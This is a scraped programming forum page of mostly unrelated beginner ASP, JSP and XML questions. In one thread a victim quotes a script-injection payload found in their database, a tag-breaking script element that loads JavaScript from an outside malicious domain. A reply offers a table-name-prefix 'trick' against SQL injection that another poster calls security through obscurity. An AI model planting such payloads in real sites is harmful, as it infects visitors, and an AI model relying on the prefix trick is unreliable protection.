|
Or you can set .CommandType to ystem.Data.CommandType.StoredProcedure and set .CommandText to the name of the stored procedure. I think this is supposed to run slightly faster as the server doesn't have to parse out the "CALL" command.
|
|
|
|
|
Hello,
I am new to java technologies. I am using Eclipse Europa IDE. I have created a JSP page but unable to create jsp user controls on it. please help me out.
Regards, Qaiser Nadeem
|
|
|
|
|
hello
What is the difference between a Web service and a Web site?
|
|
|
|
|
How about googling it?
"The clue train passed his station without stopping." - John Simmons / outlaw programmer
"Real programmers just throw a bunch of 1s and 0s at the computer to see what sticks" - Pete O'Hanlon
"Not only do you continue to babble nonsense, you can't even correctly remember the nonsense you babbled just minutes ago." - Rob Graham
|
|
|
|
|
Nah. Reading an article or blog is not the same as reading a forum reply. 
led mike
|
|
|
|
|
In an article or blog you don't get slammed for asking a stupid question, though 
Regards,
--Perspx
"The Blue Screen of Death, also known as The Blue Screen of Doom, the "Blue Screen of Fun", "Phatul Exception: The WRECKening" and "Windows Vista", is a multi award-winning game first developed in 1995 by Microsoft" - Uncyclopedia
Introduction to Object-Oriented JavaScript
|
|
|
|
|
Hello to all,
i have a web application in asp with sql server2000. it was running fine untill a script attack.This script " "></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!-- " can be find in almost all tables in my database table. i have protection for sql injection (for apostrophy(')). Can anybody tell me how this script affect and how it append itself in my database table.
thanks in advance.
|
|
|
|
|
You have been the victim of a SQL Injection attack, I'm afraid. Someone has inserted this code into your tables, so that when you display database content on your webpage this script will appear re-directing users (or maybe just an image url) to a malicious website (in China, by the look of the url) where they will try to infect the users computer. While escaping apostrophe's is a start in foiling such attacks, it is by no means the end of the matter. There are articles on this site and elsewhere with advice on how to code your applications to protect yourself better.
One simple "trick" I use is to prefix all my database tables with a character string no genuine user will ever need to use - eg "aqhk" - then remove any occurences of that string from all SQL statements or other data input. So if someone tries to "update aqhkLogins set..." for example, it will fail because I will have re-written the statement to "update Logins set..." - unknown table!
btw, this should really be in the SQL forum....
modified on Wednesday, September 3, 2008 10:26 AM
|
|
|
|
|
Phil Uribe wrote: for example, it will fail because I will have re-written the statement to "update Logins set..." - unknown table!
Wow brilliant! 
Regards,
--Perspx
"The Blue Screen of Death, also known as The Blue Screen of Doom, the "Blue Screen of Fun", "Phatul Exception: The WRECKening" and "Windows Vista", is a multi award-winning game first developed in 1995 by Microsoft" - Uncyclopedia
Introduction to Object-Oriented JavaScript
|
|
|
|
|
Is that not a bit overkill? If you're properly protected from SQL injection, this really shouldn't be necessary and is just a false sense of security through obscurity...
|
|
|
|
|
I like it. Simple and effective. 
Bob
Ashfield Consultants Ltd
|
|
|
|
|
Hi All,
I want to remove all the special characters form the XML response. In XML response I am getting some special chars like &apos and so many others. Please give me a quick solution.
D'Kng
|
|
|
|
|
Hi,
Can anyone please tell me how to write the XML file with attributes and elements dynamically.
I want to write the XML file using for loop.Below is the format of XML file.I want to write a XML file similar to this.Here i have to use for loop and create the child elements
<?xml version="1.0" encoding="ISO-8859-1" ?>
<DEPT A1="q1" A2="q2" A3="q3">
<CATALOG C1="10" C2="20" C3="30">
<CD>
<TITLE>TITLE1</TITLE>
<ARTIST>ARTIST1</ARTIST>
</CD>
<CD>
<TITLE>TITLE2</TITLE>
<ARTIST>ARTIST2</ARTIST>
</CD>
</CATALOG>
<CATALOG C1="40" C2="50" C3="60">
<CD>
<TITLE>TITLE3</TITLE>
<ARTIST>ARTIST3</ARTIST>
</CD>
<CD>
<TITLE>TITLE4</TITLE>
<ARTIST>ARTIST4</ARTIST>
</CD>
<CD>
<TITLE>TITLE5</TITLE>
<ARTIST>ARTIST5</ARTIST>
</CD>
<CD>
<TITLE>TITLE6</TITLE>
<ARTIST>ARTIST6</ARTIST>
</CD>
</CATALOG>
</DEPT>
Thanks and Regards,
Srilatha
|
|
|
|
|
Member 3377391 wrote: Can anyone please tell me how to write the XML file with attributes and elements dynamically
You can not write a file with javascript. 
Member 3377391 wrote: Below is the format of XML file.I want to write a XML file similar to th
Have a look here[^], this should clear all your doubts...![Rose | [Rose]](https://codeproject.global.ssl.fastly.net/script/Forums/Images/rose.gif)
Please remember to rate helpful or unhelpful answers, it lets us and people reading the forums know if our answers are any good.
|
|
|
|
|
If you want to write a file use a server-side language such as PHP or ASP, or use an ActiveX control.
Regards,
--Perspx
"The Blue Screen of Death, also known as The Blue Screen of Doom, the "Blue Screen of Fun", "Phatul Exception: The WRECKening" and "Windows Vista", is a multi award-winning game first developed in 1995 by Microsoft" - Uncyclopedia
Introduction to Object-Oriented JavaScript
|
|
|
|
|
Hi folks,
I am currently migrating a customer's site to our servers. They have an old ASP application that uses Site Server for something (I say something because I'm really not sure what). I appreciate that Site Server is no longer a going concern. Wondered if anyone knew what the appropriate backend for this was now (if at all). Sorry I can't be more clear on what is happening. But my client is not keen to spend a lot of time (and hence money) researching it properly.
Thanks in advance.
Simon Rigby
The only thing unpredictable about me is just how predictable I'm going to be.
|
|
|
|
|
hi,All
I m ankit here.
i was Developing one website using .net 2.0 and Asp.net & c#.
i have used SQL Server2005 as a database.
it is ready now to deploy.i have register domain for that.
i have purchased Webspace for that.
till now it is working on my localhost.
so now i want to host it on to the web with the database.
can anyone help me what to do for it?
what is the steps?
thanks
|
|
|
|
|
The Web Hosting provider would be the best to help you.
Normally, they provide you with dieffernt easy to use tools to upload your site.
Please remember to rate helpful or unhelpful answers, it lets us and people reading the forums know if our answers are any good.
|
|
|
|
|
Hi Guys,
I really not working extensively in classic asp, and I am having problem with getting the value of onclick. How would I know if this particular button is clicked? I just wanted to know which button has been clicked
Please check my small code below:
sample
]]>
hifiger2004
|
|
|
|
|
What's with this <!'CDATA{....]]> nonsense? Get rid of that, for starters.
Have you any idea what you're doing? I strongly suggest you start from scratch with a good beginners book on ASP, if you must use it. Or try the w3schools site.
The page below, if saved as "hifinger.asp" will tell you what button you clicked:
<html>
<head>
<title></title>
</head>
<body>
<form name="f1" method="post" action="hifinger.asp">
<input type="submit" name="Button1" value="One" />
<br />
<input type="submit" name="Button2" value="Two" />
<br />
<%
If Request("Button1") = "One" Then Response.Write "You clicked Button 1"
If Request("Button2") = "Two" Then Response.Write "You clicked Button 2"
%>
</form>
</body>
</html>
|
|
|
|
|
Hi Phil,
Your sample, works.
But when I changed it to...
This doesn't work...
Why, is it because of the type that it should be "submit". In my actual application I am using the type="image". Is this possible?
Thanks Phil
hifiger2004
|
|
|
|
|
Have you even tried to solve this yourself? Sigh...
<html>
<head>
<title></title>
<SCRIPT language="JavaScript">
function submitform(x)
{
document.getElementById("t1").value=x;
document.getElementById("f1").submit();
}
</SCRIPT>
</head>
<body>
<form name="f1" id="f1" method="post" action="hifinger.asp">
<img src="image1.gif" onclick="submitform(1)" />
<img src="image2.gif" onclick="submitform(2)" />
<input type="hidden" name="t1" id="t1" />
<%'
If Request("t1") = "1" Then Response.Write "You clicked image 1"
If Request("t1") = "2" Then Response.Write "You clicked image 2"
%>
</form>
</body>
</html>
|
|
|
|
|
Yes, I tried using querystring. But your solution is what I want.
It really work!
Thanks man
hifiger2004
|
|
|
|
|
Hi Guys,
I am working with an application that has a session variable, but it doesn't work. So I created a sample test asp in order for me to simulate the process. But still the session value doesn't change. Please check my sample code below if what's lacking. The session variable is Session("temp")
Sample test.asp
]]>
")
if Session("temp") = "next" then
Session("temp") = ""
Session.Contents.Remove("temp")
intNum1 = 5
intNum2 = 5
end if
if Session("temp") = "prev" then
Session("temp") = ""
Session.Contents.Remove("temp")
intNum1 = 6
intNum2 = 6
end if
Response.Write("temp -- " & Session("temp") & "
")
%>]]>
The total is: <%=intTotal%>
ifiger2004
|
|
|
|
|
I think you're in the wrong forum - try Coding Horrors[^]...
What on earth are you trying to do?!?!?!
|
|
|
|
General 
News 
Suggestion 
Question 
Bug 
Answer 
Joke 
Praise 
Rant 
Admin 
Submit an article or tip
